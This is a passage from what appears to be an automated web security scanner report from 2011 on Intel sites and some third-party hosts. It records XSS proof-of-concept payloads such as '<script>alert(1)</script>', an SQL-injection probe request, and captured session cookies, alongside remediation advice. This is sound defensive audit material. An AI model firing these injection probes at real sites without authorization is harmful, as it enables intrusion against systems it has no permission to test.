Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755
Content-Length: 69
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=CDELKMPAGGGMGBKHKJPMODBH; path=/
4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.intel.com
Path: /pressroom/index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cfeb6<script>alert(1)</script>8732c9cbc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pressroom/index.htm?cfeb6<script>alert(1)</script>8732c9cbc96=1 HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 
INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?cfeb6<script>alert(1)</script>8732c9cbc96=1
Content-Length: 43
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:33 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=CNNMGNPABDJEOBDKJLPLFJNJ; path=/
cfeb6<script>alert(1)</script>8732c9cbc96=1
5. Flash cross-domain policy
There are 4 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: i.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: gdata.youtube.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 Connection: close Content-Length: 1581
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.intel.com
Response
HTTP/1.0 200 OK Content-Length: 290 Content-Type: text/xml Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT Accept-Ranges: bytes ETag: "78bab694ff15c61:4299" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sat, 05 Feb 2011 23:13:36 GMT Connection: close
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://digg.com/submit?url=
The form contains the following password field:
password
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33772
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
Request
GET /Search/newsearch.php3?Category=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&Go=Go!&S_S=3 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.freedownloadscenter.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /references/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; 
__utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36568
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Reference Room: Intel Business Success Stories</title> ...[SNIP]... <li><a href="http://communities.intel.com/community/vproexpert;jsessionid=152C4B2202F8C74B9C1A846300448669">Intel. vPro. Expert Center</a> ...[SNIP]... <li><a href="http://communities.intel.com/community/server;jsessionid=152C4B2202F8C74B9C1A846300448669">The Server Room</a> ...[SNIP]...
10. Password field submitted using GET method
Summary
Severity: Low
Confidence: Certain
Host: http://digg.com
Path: /submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://digg.com/submit?url=
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/openportit/server HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/tech/desktop HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jspa HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: newsroom.intel.com
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 01:56:20 GMT Server: Apache Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/ Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/ X-JAL: 17 Content-Language: en-US CacheHit: D=26624 t=1296957380484009 X-JSL: D=26628 t=1296957380484009 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en-us X-Pingback: http://software.intel.com/en-us/services/comment/pingback/ Date: Sat, 05 Feb 2011 23:21:40 GMT Content-Length: 20519 Connection: close Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com Set-Cookie: loginpt=0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/academic_showcase/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /<BR/ HTTP/1.1 Host: www.sigcse.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:15:20 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 10731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr"> <head> <meta ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
